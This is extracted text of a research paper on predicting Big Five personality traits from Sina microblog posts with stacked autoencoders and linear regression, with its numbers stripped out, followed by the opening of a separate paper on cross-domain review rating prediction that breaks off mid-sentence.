learning algorithm. related work at present, many researchers have paid attention to the correlation between users’ internet behaviors and their personality traits. qiu et al. ( ) investigated the relationship between tweets delivered on twitter and users’ personality, and they found that some personality characteristics such as openness (o), extraversion (e) and agreeableness (a) are related to specific words used in tweets. similarly, vazire & gosling ( ) discovered that there is great relevance between users’ specific internet behaviors and their personality through studying users’ behaviors on personal websites. these conclusions can be explained as personality not only influencing people’s daily behaviors, but also playing an important role in users’ internet behaviors. with the rise of social media, more and more researchers begin to analyse users’ personality traits through social network data with the help of computer technology. sibel & golbeck ( ) predicted users’ personality based on operational behaviors on twitter utilizing linear regression model. similarly, golbeck et al. ( ) used regression algorithm to build a personality prediction model, but they considered both of operational behaviors and linguistic behaviors. lima & de castro ( ) used a semi- supervised method to predict personality based on the attributes of linguistic behaviors extracted from tweets. ortigosa, carro & quiroga ( ) built a personality prediction liu and zhu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. model of users according to their social interactions in facebook by machine-learning methods, such as classification trees. although many researchers utilized machine learning methods to built personality prediction models and have made some achievements, there are also some disadvantages for which improvements are needed. first, in state-of-art methods, the behavior analysis method and behavior attributes extraction methods are mostly based on some experiential heuristic rules which are set artificially. the behavior attributes extracted manually by statistical methods may not be able to comprehensively and objectively describe the characteristics of behaviors. second, supervised and semi-supervised behavior feature extraction methods need a certain amount of labeled data, but obtaining a large number of labeled data is difficult, time-consuming and has a high cost. therefore, supervised and semi-supervised feature extraction methods are not suitable for a wide range of application. deep learning in recent years, there are more and more interdisciplinary research of computational science and psychology (zhang et al., ; chen et al., ). deep learning is a set of algorithms in machine learning (bengio, ; bengio, courville & vincent, ), which owns a hierarchical structure in accordance with the biological characteristics of human brain. the deep learning algorithm originated in artificial neural networks, and has been applied successfully in many artificial intelligence applications, such as face recognition (huang, lee & learned-miller, ), image classification (ciresan, meier & schmidhuber, ), natural language processing (socher et al., ) and so on. recently, researchers are attempting to apply deep learning algorithms to other research fields. huijie et al. ( a) and huijie et al. ( b) used the cross-media auto-encoder (cae) to extract feature vectors, and identified users’ psychological stress based on social network data. due to the multi-layer structure and mathematics algorithm design, deep learning algorithms can extract more abstract high-level representation from low-level feature through multiple non-linear transformations, and discover the distribution characteristics of data. in this paper, based on the deep learning algorithm, we could train unsupervised linguistic behavior feature learning models for five factors of personality. through the feature learning models, the lrfv corresponding to each personality trait can be learned actively from users’ contents published on the sina microblog. the lrfv could describe the users’ linguistic behavior more objectively and comprehensively, and improve the accuracy of the personality prediction model. dataset in this paper, we utilize deep learning algorithm to construct an unsupervised feature learning model which can actively and objectively extract the linguistic representation feature vector (lrfv) from users’ content published on the sina microblog. next, five personality prediction models corresponding to five personality traits are built using a linear regression algorithm based on lrfv. we conducted preliminary experiments on relatively small data as pre-study of exploring the feasibility of using deep learning algorithm to investigate the correlation between a user’s social network behavior and personality. liu and zhu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data collection nowadays, users prefer expressing their attitudes and feelings through social network. therefore, the linguistic information on social network is more significant for analysing users’ personality characteristics. in this paper, we pay more attention to the correlation between users’ linguistic behaviors on sina microblog and their personalities. according to the latest statistics, by the end of dec. , the total number of registered users of sina microblog has exceeded million. on the spring festival’s eve, the number of daily active users was more than one billion. it can be said that the sina microblog is currently one of the most popular social network platforms in china. similarly to facebook and twitter, sina microblog users can post blogs to share what they saw and heard. through the sina microblog, people express their inner thoughts and ideas, follow friends or someone they want to pay attention to, and comment or repost blogs that interest them or on which they agree. for data collection, we firstly released the experiment recruitment information on sina microblog. based on the assumption that the users are often express themselves on social media platform, we try to construct personality prediction model. so, it is required that for one person, there have to be enough sina microblog data. on the other hand, some participants might provide their deprecated or deputy accounts of social network rather than the commonly used and actual accounts when participating our experiment; such data are unfaithful. in consideration of this, we set an ‘‘active users’’ selection criteria for choosing the effective and authentic samples. our human study has been reviewed and approved by the institutional review board, and the protocol number is ‘‘h .’’ in totally, , volunteers were recruited to participate in our experiments. they have to finish the big five questionnaire (vittorio et al., ) online and authorized us to obtain the public personal information and all blogs. collecting volunteers’ ids of sina microblog, we obtained their microblog data through sina microblog api. the microblog data collected consists of the users’ all blogs and their basic status information, such as age, gender, province, personal description and so on. the whole process of subjects recruitment and data collection lasted nearly two months. through the preliminary screening, we obtained , valid samples finally. when filtering invalid and noisy data, we designed some heuristic rules as follows: • if the total number of one’s microblogs is more than , this volunteer is a valid sample. this rule can ensure that the volunteer is an active user. • in order to ensure the authenticity of the results of questionnaire, we set several polygraph questions in the questionnaire. the samples with unqualified questionnaires were removed. • when the volunteers filled out the questionnaire online, the time they took on each question were recorded. if the answering time was too short, the corresponding volunteer was considered as an invalid sample. in our experiments, we set that the answering time should be longer than s. liu and zhu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data for linguistic behavior feature learning through iteration and calculation layer by layer, a deep learning algorithm can mine the internal connection and intrinsical characteristics of linguistic information on social network platforms. assuming that the text in microblogs could reflect users’ personality characteristics, for each trait of personality, we build a linguistic behavior feature learning model based on the deep learning algorithm to extract the corresponding lrfv from users’ expressions in the sina microblog. linguistic inquiry and word count (liwc) is a kind of language statistical analysis software, which has been widely used by many researchers to extract attributes of english contents from twitter and facebook (golbeck et al., ; golbeck, robles & turner, ). in order to meet the demands of simple chinese semantic analysis, we developed a simplified chinese psychological linguistic analysis dictionary for the sina microblog (scliwc) (gao et al., ). this dictionary was built based on liwc (tausczik & pennebaker, ) and the traditional chinese version of liwc (cliwc) (huang et al., ). besides referring to the original liwc, we added five thousand words which are most frequently used in the sina microblog into this dictionary. the words in the dictionary are classified into categories according to emotion and meaning, such as positive word, negative word, family, money, punctuation, etc. through analysis and observation, we found that in some factors of personality, users of different scores show great differences in the number of used words belonging to positive emotion, negative emotion and some other categories in the dictionary. according to scliwc (gao et al., ), the users’ usage degree of words in blogs could be computed in categories. in order to obtain the usage characteristics of social media text in the temporal domain, we first divide the time by week. for the ith word category of scliwc, the usage frequency within the jth week f ij (i= , ,..., ) is calculated by eq. ( ), in which, i denotes the serial number of category, and j denotes the serial number of week. we collect all the text published in sina microblog during recent three years (jun. –jun. ), and there are weeks in total. therefore, corresponding to each category of scliwc, the vector f i={f i ,f i ,...,f i } is the digital representation of the ith category in temporal domain. f ij = the number of words belongs to the ith category of scliwc in jth week the total number of words in blogs in jth week . ( ) then, we utilize fast fourier transform(fft) (loan, ) to obtain the varying characteristics of social media text usage in temporal space. fourier transform is a special integral transform, which could convert the original temporal signal into frequency domain signal which is easily analyzed. fft is the fast algorithm of discrete fourier transform (dft), defined by x(k)=dft[x(n)]= n− ∑ n= x(n)w knn , k= , ,...,n − ( ) wn =e −j πn . ( ) liu and zhu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in order to extract the temporal information from massive high-dimensional digital vectors, fourier time-series analysis is considered. concretely, we conduct fft for each vector. through fft, the amplitudes calculated include frequency information, and former maximum amplitudes are selected to constitute a vector as the representation of each word category. finally, linking the vectors of each category in series, we can obtained a linguistic vector of length corresponding to each user id. in our experiment, we use , users’ blogs published in three years as data for preliminary study. each user’s linguistic behavior is represented as vector form through fft based on scliwc. data for personality prediction in order to verify that the deep learning algorithm is an effective method for extracting a representation of a user’s sina microblog linguistic behaviors, we built a personality prediction model based on linguistic behavior feature vectors. the personality prediction model is constructed by a linear regression algorithm. for each volunteer, five linguistic behavior feature vectors corresponding to five traits of personality are obtained by feature learning models, respectively. the training process of the personality prediction model is supervised, so users’ five scores of five personality traits in the big five questionnaire are taken as their labels of the corresponding linguistic behavior feature vectors. methods unsupervised feature learning based on stacked autoencoders feature learning can be seen as a process of dimensionality reduction. in order to improve the computational efficiency, for all traits of personality, we utilize the relatively simpler form of artificial neural network, autoencoder (bengio, ). figure shows the basic structure of an autoencoder. basically, for an autoencoder, the input and output own the same dimensions, both of them can be taken as x but, through mathematical transfor- mation, the input and output may be not completely equal. in fig. , x denotes input and x ′ denotes output. the variable in hidden layer y is encoded through x by eq. ( ). y = fθ(x)= s(w t x+b)= s ( n∑ i= wixi+b ) ( ) s(z)= +exp(−z) . ( ) in eq. ( ), {w,b} are parameters which can be obtained through training. s(z) is the sigmoid activation function of hidden layers which is defined in eq. ( ). in addition, a reconstructed vector x ′ in input vector space could be obtained by mapping the result of hidden layer y back through a mapping function, x ′=gθ′(y )= s ′(w ′t y +b′)= s ( n∑ i= w ′i yi+b ′ ) . ( ) for an autoencoder, if we want the mapping result y as another representation of input x, it is assumed that the input x and the reconstructed x ′ are the same. according to this liu and zhu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the basic structure of an autoencoder. assumption, the training process of an autoencoder could be conducted and the parameters of the autoencoder are adjusted according to minimize the error value l between x and x ′, as shown in the eq. ( ) and fig. . due to the fact that the error is directly computed based on the comparison between the original input and the reconstruction obtained, the whole training process is unsupervised. l(x;w,b)=‖x ′−x‖ . ( ) several autoencoders are stacked to initialize the deep architectures layer by layer as fig. . let the hidden layer of kth layer be used as the input of (k+ )th layer. we used greedy layer-wise training to obtain the optimal parameters {w,b} for a stacked autoencoder model. that is, the parameters of each layer are trained individually while freezing parameters for the remainder of the model. the output of the nth layer y n is used as the input of the subsequent (n+ )th layer to trained the parameters. the number of layer would be decided according to the optimal value of many experiments. adjusting the number of layers, and the number of layer corresponding the better performance of prediction model would be set as the optimal number of layer. then, we take the output of the last layer as the abstract representation of the original linguistic behavior information. figure shows the structure of our model. for different personality factors, the number of layers and the number of units in each layer are different. the details are presented on the left of fig. . for ‘‘a,’’ ‘‘c’’ and ‘‘n,’’ there are one hidden layers in the sae, and the liu and zhu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the training principle diagram of an autoencoder. figure the deep structure of our prediction model. the left table shows the details of sae of the different personality factors. feature learning model are three layers in total. for ‘‘e’’ and ‘‘o,’’ there are two hidden layers in the sae. in our experiments, , users’ content information of sina microblog are used as training dataset, and the unsupervised feature learning models corresponding different personality traits are trained respectively. that is, we could obtain five feature learning models in total. for each trait, there will be corresponding linguistic behavior feature vectors extracted from social network behavior data actively. finally, based on the big five questionnaire, for each user, we could obtained five scores (sa, sc, se, sn , so) corresponding to ‘‘a,’’ ‘‘c,’’ ‘‘e,’’ ‘‘n,’’ ‘‘o’’ five factors, respectively. these scores are used to label corresponding linguistic behavior feature vectors for personality prediction models. personality prediction model based on linear regression personality prediction is a supervised process. the linguistic behavior feature vectors are labeled by the corresponding scores of the big five questionnaire. for five traits of personality, we utilized the linear regression algorithm to build five personality prediction models in totally. take one trait of personality as an example, the linguistic behavior feature vectors are represented by x ={xi|xi=(xi ,xi ,...,xim)} n i= , ( ) liu and zhu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in which, n is the number of samples, n= , , and m denotes the number of dimensions of the input vector. the scores of the big five questionnaire are taken as the labels, y ={yi} n i= . ( ) the general form of linear regression is yi=ω xi +ω xi +···+ωmxim+εi,(i= , ,...,n). ( ) we trained five personality prediction models based on linear regression algorithm using corresponding linguistic behavior feature vectors and labels. results in experiments, we collect , users’ sina microblog data in total. the linguistic behavior of users are quantified based on scliwc, and the temporal characteristics are calculated through fft. then, we utilize deep learning algorithm to construct feature learning models, which could extract objective and comprehensive representation of linguistic behaviors from the temporal sequence. finally, personality prediction model is trained by the linear regression algorithm based on linguistic behavior feature vectors. evaluation measures in this paper, we conducted preliminary study about constructing microblog behavior representation for predicting social media user’s personality. the five factors of personality are all tested. we use the pearson product-moment correlation coefficient (r) and root mean square error (rmse) to measure the quality of different behavior feature representation methods. the computational formulas of two measurements are shown in eqs. ( ) and ( ) respectively. in eq. ( ), cov(y,y ′) denotes the covariance of y and y ′, and var(y ) and var(y ′) represents the variances of the real score y and prediction score y ′ respectively. when r > , it means the results of questionnaire and prediction model have a positive correlation. in contrast, r < means negative correlation. the absolute value is greater, the higher is the degree of correlation. in psychology research, we use cohen’s conventions (cohen, ) to interpret the pearson product-moment correlation coefficient. r ∈[ . , . ) represent a weak or small association and r ∈[ . , . ) indicates a moderate correlation between two variables. in eq. ( ), i is the sequence number of sample and n is the total number of samples, n= , . in the big five questionnaire used in our experiments, there are questions in all. the score ranges of ‘‘a,’’ ‘‘c,’’ ‘‘e,’’ ‘‘n,’’ ‘‘o’’ are [ , ], [ , ], [ , ], [ , ], [ , ] respectively. the value of rmse shows the average difference between our prediction results and the scores of questionnaire. the smaller is the value of rmse, the better is the performance of prediction model. r =cor(y,y ′)= cov(y,y ′) √ var(y )var(y ′) ( ) rmse = √∑n i= (yi−y ′ i) n ( ) liu and zhu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table the comparison of prediction results in the pearson correlation coefficient. attributes ra rc re rn ro attribute (original) . . . . . attribute (pca) . . . . . attribute (stepwise) . . . . . attribute (lasso) . . . . . attributes sae . . . . . table the comparison of prediction results in rmse. attributes rmsea rmsec rmsee rmsen rmseo attribute (original) . . . . . attribute (pca) . . . . . attribute (stepwise) . . . . . attribute (lasso) . . . . . attributes sae . . . . . table the comparison of dimensionality of different feature vector. attributes da dc de dn do attribute (original) attribute (pca) attribute (stepwise) attribute sae experiment results in comparison experiments, we utilized five different kinds of attributes to train and build the personality prediction model. the five kinds of attributes include the attributes selected by artificial statistical method without feature selection (denoted by attribute ), the attributes selected from attribute by principal component analysis (pca) (dunteman, ) (denoted by attribute ), the attributes selected from attribute by stepwise (denoted by attribute ), the attributes selected from attribute by lasso (denoted by attribute ) and linguistic behavior feature vector obtained based on stacked antoencoders (sae) (denoted by attribute sae). pca is a kind of unsupervised feature dimension reduction method, and stepwise is usually used as a kind of supervised feature selection method. lasso is a regression analysis method which also perform feature selection. for different kinds of attributes, the personality prediction models are all built by a linear regression algorithm. in order to obtain the stable model and prevent occurrence of overfitting for each factor of personality, we use -fold cross validation and run over randomized experiments. finally, the mean of randomized experiments’ results is recorded as the final prediction result. the comparison of prediction results of five personality factors using three kinds of attributes are shown in tables and . table shows the dimensionality of different kinds of feature vectors. the letters in subscript ‘‘a,’’ ‘‘c,’’ ‘‘e,’’ ‘‘n,’’ ‘‘o’’ indicate different personality factors respectively. liu and zhu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. discussion this study explore the relevance between users’ personality and their social network behaviors. the feature learning models are built to perform an unsupervised extraction of the representations of social network linguistic behaviors. compared with the attributes obtained by some supervised behavior feature extraction methods, the lrfv is more objective, efficient, comprehensive and universal. in addition, based on lrfv, the accuracy of the personality prediction model could be improved. the performance of personality prediction model the results in tables and show that the linguistic behavior feature vectors learned through stacked autoencoders perform better than other attributes in both the pearson correlation coefficient and rmse. when using attribute sae, the pearson correlation coefficients re = . , which represent a small correlation. for‘‘e,’’ ‘‘n,’’ ‘‘c’’ and ‘‘o,’’ re = . , rn = . , rc = . and ro = . , which means that the prediction results of ‘‘e,’’ ‘‘n,’’ ‘‘c’’ and ‘‘o’’ correlate with the results of questionnaire moderately. it is concluded that personality prediction based on the linguistic behavior in social network is feasible. besides, the traits of conscientiousness and openness could be reflected in the network linguistic behavior more obviously. compared with other feature extraction methods, our proposed method performs better. when using the original feature vector (attributes ), the prediction results r are all less than . . when using another kind of unsupervised feature dimension reduction method (attributes ), except for ‘‘c,’’ others are also less than . . attributes , which is obtained by using a kind of supervised feature selection method, the prediction results r are also not ideal. similarly, considering rmse of every personality traits, the prediction model also obtain better results based on the linguistic behavior feature vectors. besides, we compared the time and memory consuming of prediction when using sae and pca to reduce the dimensionality of features respectively in table . the experiments were conducted on a dell desktop with an intel core . ghz cpu and g memories. the average time consuming denotes the average time cost for predicting one personality factor of one sample. the average memory consuming denotes the memory usage percentage when running the prediction model. although pca performed better in the time and memory consuming, the prediction results of linguistic behavior feature vectors were outstanding. usually, the high-powered computing server could offset the deficiency of time and memory consuming. parameters selection activation function there are many kinds of activation function in neural network, such as sigmoid, tanh, softmax, softplus, relu and linear. among them, sigmoid and tanh are used commonly. in experiment, we utilized both of them to construct the feature learning model, and the comparative results (table ) showed that when using sigmoid as activation function of hidden layers, the prediction results are a bit better. liu and zhu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table the comparison of time and memory consuming of different feature vector. attributes average time consuming average memory consuming attribute (pca) ms % attributes sae ms % table the comparison of prediction results when using different activation function. activation function ra rc re rn ro sigmoid . . . . . tanh . . . . . figure the comparison of prediction results using linguistic feature vectors with different dimen- sionality. (a) the comparison of r. (b) the comparison of rmse. the dimensionality of linguistic behavior feature vector for each personality trait, the dimensionality of linguistic behavior feature vector is set according to the optimal result of prediction model obtained from repeated experiments, and the comparison of r and rmse when using linguistic behavior feature vectors with different dimensionality are presented in figs. a and b, respectively. the pearson correlation coefficient reflects the correlation degree between two variables. if the change tendencies of two variables are more similar, the correlation coefficient is higher. root mean square error reflects the bias between the real value and prediction value. for a dataset, the pearson correlation coefficient and root mean square error may not be direct ratio. in practical applications, the trend of the psychological changes is more necessary. so, when adjusting the optimal parameters, we give priority to pearson correlation coefficient. for ‘‘a,’’ ‘‘c’’ and ‘‘n,’’ prediction models perform better when the dimensionality of feature vector is . for ‘‘e’’ and ‘‘o,’’ we could obtain the better results when the dimensionality of feature vector is . differences in modeling performance across personality traits through analysing the results of experiments, we summarize that agreeableness correlate with users’ social network linguistic behaviors relative weakly than the other personality traits. the correlation between openness and users’ social network linguistic behaviors is highest of all. we could identify whether the users own higher scores in openness or not through their blogs published in social network platform, most likely because the liu and zhu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. people with high scores in openness usually prefer to publicly express their thoughts and feelings. similarly, conscientiousness is moderately correlate with social network linguistic behaviors. and for conscientiousness, there are significant differences of using the words belonging to the categories of family, positive emotion and so on. the future work in this paper, we has carried on some preliminary study to explore the feasibility of using deep learning algorithm to construct linguistic feature learning model. more work will be conducted further. millions of users’ social media are being downloaded. in feature extraction, the massive data will be used to train the unsupervised feature learning model. besides, a new round of user experiment is progressing. we would obtain a new set of labeled data to improve our personality prediction method. the study is of great significance. it could provide new quantitative and analytical methods for the social media data, and a new perspective for real-time assessment of internet users’ mental health. conclusions in this paper, we utilized a deep learning algorithm to investigate the correlations between users’ personality traits and their social network linguistic behaviors. firstly, the linguistic behavior feature vectors extracted unsupervised using stacked autoencoders models actively. then, the personality prediction models are built based on the linguistic behavior feature vectors by linear regression algorithm. our comparison experiments are conducted on five different kinds of attributes, and the results show that the linguistic behavior feature vectors could improve the performance of personality prediction models. additional information and declarations funding the authors received support from the young talent research fund (y cx ), national basic research program of china ( cb ), and cas strategic priority research program (xda ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: young talent research fund: y cx . national basic research program of china: cb . cas strategic priority research program: xda . competing interests the authors declare there are no competing interests. author contributions • xiaoqian liu conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. liu and zhu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • tingshao zhu conceived and designed the experiments, contributed reagents/material- s/analysis tools, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability. the raw data has been supplied as data s . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references bengio y. . learning deep architectures for ai. foundations and trends in machine learning ( ): – doi . / . bengio y, courville a, vincent p. . representation learning: a review and new perspectives. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . chen j, hu b, moore p, zhang x, ma x. . electroencephalogram-based emotion as- sessment system using ontology and data mining techniques. applied soft computing : – doi . /j.asoc. . . . ciresan d, meier u, schmidhuber j. . multi-column deep neural networks for image classification. in: ieee conference on computer vision and pattern recognition. piscataway: ieee, – . cohen j. . statistical power analysis for the behavioral sciences. vol. . hillsdale: lawrence earlbaum associates. costa pt, mccrae rr. . revised neo personality inventory and neo five-factor inventory (neo-ffi) manual. odessa: psychological assessment resources. dunteman gh. . principal components analysis. sage university paper series on quantitative applications in the social sciences, series no. - . beverly hills: sage publications. funder d. . personality. annual review of psychology : – doi . /annurev.psych. . . . gao r, hao b, li h, gao y, zhu t. . developing simplified chinese psychological linguistic analysis dictionary for microblog. in: international conference on brain health informatics. golbeck j, robles c, edmondson m, turner k. . predicting personality from twitter. in: ieee third international conference on privacy, security, risk and trust (passat) and ieee third inernational conference on social computing. passat/socialcom, privacy, security, risk & trust, – . golbeck j, robles c, turner k. . predicting personality with social media. extended abstracts on human factors in computing systems – . liu and zhu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /j.asoc. . . http://dx.doi.org/ . /annurev.psych. . . http://dx.doi.org/ . /peerj-cs. huang cl, chung ck, hui n, lin yc, yi-tai s, lam bcp, chen wc, bond mh, pennebaker jw. . the development of the chinese linguistic inquiry and word count dictionary. chinese journal of psychology : – . huang gb, lee h, learned-miller e. . learning hierarchical representations for face verification with convolutional deep belief networks. in: ieee conference on computer vision and pattern recognition, – . huijie l, jia j, quan g, yuanyuan x, jie h, lianhong c, ling f. a. psychological stress detection from cross-media microblog data using deep sparse neural network. in: proceedings of ieee international conference on multimedia expo. piscataway: ieee. huijie l, jia j, quan g, yuanyuan x, qi l, jie h, lianhong c, ling f. b. user- level psychological stress detection from social media using deep neural network. in: proceedings of the acm international conference on multimedia. new york: acm, – . lima aces, de castro ln. . multi-label semi-supervised classification applied to personality prediction in tweets. in: the th brazilian congress on computational intelligence. – . loan cv. . computational frameworks for the fast fourier transform. siam review ( ): – . mischel w, shoda y, ayduk o. . introduction to personality: toward an integration. th edition. wiley press. ortigosa a, carro rm, quiroga ji. . predicting user personality by mining social interactions in facebook. journal of computer and system sciences ( ): – doi . /j.jcss. . . . qiu l, lin h, ramsay j, yang f. . you are what you tweet: personality expression and perception on twitter. journal of research in personality ( ): – doi . /j.jrp. . . . sibel a, golbeck j. . predicting personality with social behavior: a comparative study. social network analysis and mining ( ) doi . /s - - - . socher r, perelygin a, wu jy, chuang j, manning cd, ng ay, potts c. . recursive deep models for semantic compositionality over a sentiment treebank. in: conference on empirical methods in natural language processing. tausczik yr, pennebaker jw. . the psychological meaning of words: liwc and computerized text analysis methods. journal of language and social psychology ( ): – doi . / x . vazire s, gosling sd. . e-perceptions: personality impressions based on personal websites. journal of personality and social psychology ( ): – doi . / - . . . . vittorio cg, claudio b, laura b, marco p. . the ‘‘big five questionnaire’’: a new questionnaire to assess the five factor model. personality and individual differences ( ): – doi . / - ( ) -r. zhang x, hu b, chen j, moore p. . ontology-based context modeling for emotion recognition in an intelligent web. world wide web-internet and web information systems ( ): – doi . /s - - - . liu and zhu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.jcss. . . http://dx.doi.org/ . /j.jrp. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / x http://dx.doi.org/ . / - . . . http://dx.doi.org/ . / - ( ) -r http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. submitted april accepted september published october corresponding author aiqi jiang, a.jiang. @warwick.ac.uk, aiqi.jiang@yahoo.com academic editor eibe frank additional information and declarations can be found on page doi . /peerj-cs. copyright jiang and zubiaga distributed under creative commons cc-by . open access leveraging aspect phrase embeddings for cross-domain review rating prediction aiqi jiang and arkaitz zubiaga university of warwick, coventry, united kingdom queen mary university of london, london, united kingdom abstract online review platforms are a popular way for users to post reviews by expressing their opinions towards a product or service, and they are valuable for other users and companies to find out the overall opinions of customers. these reviews tend to be accompanied by a rating, where the star rating has become the most common approach for users to give their feedback in a quantitative way, generally as a likert scale of – stars. in other social media platforms like facebook or twitter, an automated review rating prediction system can be useful to determine the rating that a user would have given to the product or service. existing work on review rating prediction focuses on specific domains, such as restaurants or hotels. this, however, ignores the fact that some review domains which are less frequently rated, such as dentists, lack sufficient data to build a reliable prediction model. in this paper, we experiment on datasets pertaining to different review domains of varying level of popularity to assess the performance of predictions across different domains. we introduce a model that leverages aspect phrase embeddings extracted from the reviews, which enables the development of both in-domain and cross-domain review rating prediction systems. our experiments show that both of our review rating prediction systems outperform all other baselines. the cross-domain review rating prediction system is particularly significant for the least popular review domains, where leveraging training data from other domains leads to remarkable improvements in performance. the in-domain review rating prediction system is instead more suitable for popular review domains, provided that a model built from training data pertaining to the target domain is more suitable when this data is abundant. subjects artificial intelligence, computational linguistics, data science, natural language and speech keywords aspect phrase embeddings, review rating prediction, sentiment analysis, social media, cross-domain reviews, yelp, amazon, tripadvisor, word embeddings, multinomial logistic regression introduction in recent years, the advent and the prevalent popularisation of social media has led to a change in users’ habits of surfing the internet (kaplan & haenlein, ; quan-haase & young, ; perrin, ; goss, ). since the emergence of social media platforms, internet users are no longer limited to browsing online contents as mere readers, but they also can also contribute by expressing and sharing their opinions (salehan, zhang & aghakhani, ). users can freely post comments and share experiences on target entities how to cite this article jiang a, zubiaga a. . leveraging aspect phrase embeddings for cross-domain review rating prediction. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mailto:a.jiang. @warwick.ac.uk mailto:aiqi.jiang@yahoo.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. such as products, businesses or events on online review platforms like http://yelp.com or http://amazon.com (salehan & kim, ; xing et al., ). these reviews present the subjective opinions of people on products or businesses, which are invaluable for consumers and companies (sparks & browning, ). given the volume of these reviews and the fact that they are spread on different sites across the internet, it becomes more challenging and costly to aggregate all the reviews on a particular product or business (zhang & qu, ). to alleviate the cost of this task, there is a need to explore the development of automated review rating prediction systems. there has been work in the scientific literature looking at review rating prediction (li et al., ; fan & khademi, ; seo et al., a; wang et al., ; xing et al., ; wang et al., ). this work has however been limited to the prediction of ratings of reviews in very popular domains, such as restaurants (ganu, elhadad & marian, ; zhang et al., ; laddha & mukherjee, ; xing et al., ), hotels (zhao, qian & xie, ; laddha & mukherjee, ) or movies (ning et al., in press). for these domains, it is relatively easy to get a large-scale dataset from online sources for training a review rating prediction system, thanks to sites like tripadvisor or yelp where large collections of rated reviews are publicly accessible. the task can however become more challenging for less popular domains, where the dearth of rated reviews available online inevitably means that the scarcity of labelled data available to train a rating prediction model will be rather limited. moreover, the variance in vocabulary across different domains makes it more difficult to develop a prediction system that generalises to different domains; while reviewers are expected to use phrases like well written or entertaining book to express that they liked a book, a different vocabulary is expected to indicate that they liked a dentist, such as careful treatment or clean office. our work builds on the idea that these phrases, associated with different aspects that vary across domains, can be effectively leveraged for the review rating prediction if the barriers between domains are reduced. to the best of our knowledge, review rating prediction for non-popular domains has not been studied in previous work, and our work is the first attempt to do so. we propose to pursue review rating prediction for non-popular domains by developing a cross-domain rating prediction system, where rated reviews from popular domains can be leveraged to build a model which can then be generalised to non-popular domains. to facilitate and ensure the effectiveness of building a model that will generalise to other domains, we propose an approach for generating aspect phrase embeddings and polarised aspect phrase embeddings, where phrases that vary across domains can be brought to a common semantic space by using word embeddings. in this work we make the following contributions: • we introduce the first cross-domain review rating prediction system that creates semantic representations of aspect phrases using word embeddings to enable training from large-scale, popular domains, to then be applied to less popular domains where labelled data is limited. • we perform experiments with datasets pertaining to different types of businesses of different levels of popularity. jiang and zubiaga ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://yelp.com http://amazon.com http://dx.doi.org/ . /peerj-cs. • our analysis shows that, while an in-domain review rating prediction system is better for popular domains, for the least popular domains our cross-domain review rating prediction system leads to improved performance when we make use of aspect phrase embeddings. • different from an in-domain prediction system, our cross-domain system can be effectively applied to a wide range of product domains found on the internet that do not necessarily have proper review rating systems to collect labelled data from. • our classifier outperforms the results of a ncf (cheng et al., ), a state-of-the-art rating prediction system, in out of domains, showing its generalisability across domains of different levels of popularity. related work there has been a body of research in sentiment analysis in recent years (liu & zhang, ). this research has worked in different directions by looking into lexicon-based approaches (hu & liu, ; taboada et al., ), machine learning methods (pang, lee & vaithyanathan, ; ye, zhang & law, ; tripathy, agrawal & rath, ) and deep learning techniques (wang et al., ; poria et al., ; zhang, wang & liu, ; xing et al., ). different from the sentiment analysis task, the review rating prediction task consists of determining the score—as a rating between and —that a user would give to a product or business, having the review text as input. while this may at first seem like a fine-grained sentiment analysis task, which is a translation of a textual view to a numerical perspective and consists of choosing one of five labels rather than three labels (positive, neutral, negative), there are two key characteristics that make the review rating prediction task different. first, the sentiment of a review is not necessarily the same as the rating, as a user may express a positive attitude when sharing a low rating opinion of a business, e.g., ‘‘i very much enjoyed my friend’s birthday celebration, however the food here is below standard and we won’t be coming back’’. and second, a review tends to discuss different aspects of a business, some of which may be more important than others towards the rating score, e.g., in a review saying that ‘‘the food was excellent and we loved the service, although that makes the place a bit pricey’’, a user may end up giving it a relatively high score given that key aspects such as the food and the service were considered very positive. in addition, the review can discuss different aspects, and the set of aspects discussed in each review can vary, with some users not caring about certain aspects; e.g., one user focuses on food while another one focuses more on price (ganu, elhadad & marian, ). using the same star rating mode to express the score of specific features can be more helpful to find users’ interests. hence, we argue that a review rating prediction system needs to consider the opinions towards different aspects of a business. we achieve this by extracting aspect phrases mentioned in different 